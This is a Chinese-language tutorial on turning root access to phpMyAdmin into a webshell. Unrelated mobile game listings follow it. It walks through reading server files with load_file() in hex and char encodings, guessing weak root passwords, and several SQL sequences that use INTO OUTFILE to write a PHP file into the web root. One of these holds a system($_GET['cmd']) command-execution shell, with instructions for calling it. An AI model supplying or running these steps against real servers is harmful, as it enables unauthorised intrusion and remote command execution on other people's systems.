phpmyadmin执行语句拿webshell
root密码可以通过以下方法进行尝试:
方法:load_file()
C:boot.ini
load_file(0x433A5C626F6F742E696E69) 16进制
load_file(char(67,58,92,98,111,111,116,46,105,110,105)) ascii
Conn.php config.php mainconn.php
很多情况有时候管理员没有修改root密码那么可以通过弱口令root root rrot 123 等 密码来进行尝试登录
当我们或者了phpmyadmin的最高权限root权限后,且已知网站的物理路径 (物理路径一般在网站后台会有显示 )
就可以通过一下sql语句来获得网站的webshell。
假设网站的物理路径是 C:htdocs
就可以执行下面的SQL语句
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile ' C:/htdocs/1.php'; (这里的要把网站的物理路径的修改为/)
Drop TABLE IF EXISTS a;
----end code---
执行语句后如果提示以上信息说明SQL语句已经执行成功。然后就可以在网站根目录后面加上1.php就可以直接获得一句话。
然后通过一句话客户端来链接就可以获得网站的webshell了。
更为详细的方法:
第一种
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('');
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/exehack.php';
DROP TABLE IF EXISTS `darkmoon`;
(这种方法是最为常见的成功率也比较高,懂sql语句的朋友一眼就应该可以看懂什么意思)
以上代码意思就是选择musql数据库 然后建立一个darkmoon的表然后加入一个名字为darkmoon1的字段
然后在darkmoon1的字段中插入一句话代码
然后从darkmoon1字段里面导出一句话到d:/wamp/www/exehack.php 的文件名(这里的路径就是网站的程序路径)
最后就是删除darkmoon这个表。
第二种方法
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES('');
select darkmoon from moon into outfile 'd:/wamp/www/exehack.php';
Drop TABLE IF EXISTS moon;
以上方法原理基本与方法一一致
第三种方法:
select ''INTO OUTFILE 'd:/wamp/www/exehack.php'
第四种方法
select '';system($_GET['cmd']); echo ''; ?>' INTO OUTFILE 'd:/wamp/www/exehack.php'
不同之处在于导出成功后可以直接执行DOS命令(只要权限够大)
使用方法:www.xxx.com/exehack.php?cmd= (cmd=后面直接执行dos命令)
以上4种方法一般情况下足够拿到网站的webshell权限了。
如果你知道网站的物理路径的话可以尝试一下方法或者网站的物理路径。
我的博物馆故事 官方安卓版v1.61.2
我的博物馆故事是一款以消除为主题的经营养成类手游,在这里玩家
专业模拟飞行10 手机版v12.2.4
专业模拟飞行10安卓版是一款飞行休闲手游,顶尖的物理飞行引擎
动物起义战斗模拟器二琳同款 最新版v4.1.1
动物起义战斗模拟器是一个非常有趣的模拟类游戏,玩家可以召唤各
迷你世界七周年 安卓手机版v1.43.0
迷你世界7周年是一款由《迷你世界》官方推出的庆祝特别版本,在
劫后公司无限资源版 v1.0.5.1
劫后公司内置菜单版是游戏的破解版本,在该版本中为玩家提供了内